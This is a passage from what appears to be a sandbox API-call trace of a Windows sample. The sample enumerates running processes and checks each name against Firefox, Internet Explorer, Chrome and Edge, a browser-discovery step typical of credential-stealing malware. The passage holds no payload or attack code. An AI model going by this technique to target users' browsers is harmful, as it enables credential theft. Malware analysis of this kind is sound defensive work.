lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.096] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.096] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.096] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0224.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0224.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0224.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.100] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0224.100] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0224.100] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0224.100] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0224.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0224.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0224.101] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0224.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0224.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0224.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.102] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.102] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.102] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.102] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0224.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0224.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0224.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0224.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0224.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0224.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0224.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0224.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0224.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0224.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0224.104] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0224.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0224.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0224.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0224.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0224.105] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0224.105] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0224.105] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0224.105] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0224.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0224.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0224.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0224.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0224.106] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0224.106] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0224.106] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0224.106] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0224.106] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0224.106] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0224.106] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0224.107] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0224.107] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0224.107] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0224.107] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0224.107] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0224.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0224.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0224.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0224.108] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0224.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0224.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0224.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0224.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0224.109] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0224.109] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0224.109] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0224.109] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.109] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0224.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0224.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0224.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0224.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0224.110] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0224.110] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0224.110] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0224.110] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0224.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0224.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0224.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0224.111] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0224.111] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0224.111] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0224.111] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0224.111] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.111] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0224.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0224.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0224.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0224.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0224.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0224.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0224.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0224.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.112] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0224.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0224.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0224.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0224.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.113] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0224.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0224.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0224.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0224.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.114] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0224.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0224.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0224.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0224.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.114] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0224.115] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0224.115] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0224.115] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0224.115] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.115] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0224.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0224.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0224.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.115] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.116] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.116] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.116] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.116] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.116] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0224.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0224.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0224.116] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.116] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.117] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.117] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.117] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.117] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.117] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0224.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0224.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0224.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.118] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.118] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.118] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.118] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.118] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.118] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0224.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0224.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0224.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.119] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.119] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0224.119] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0224.119] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0224.119] lstrcmpiA 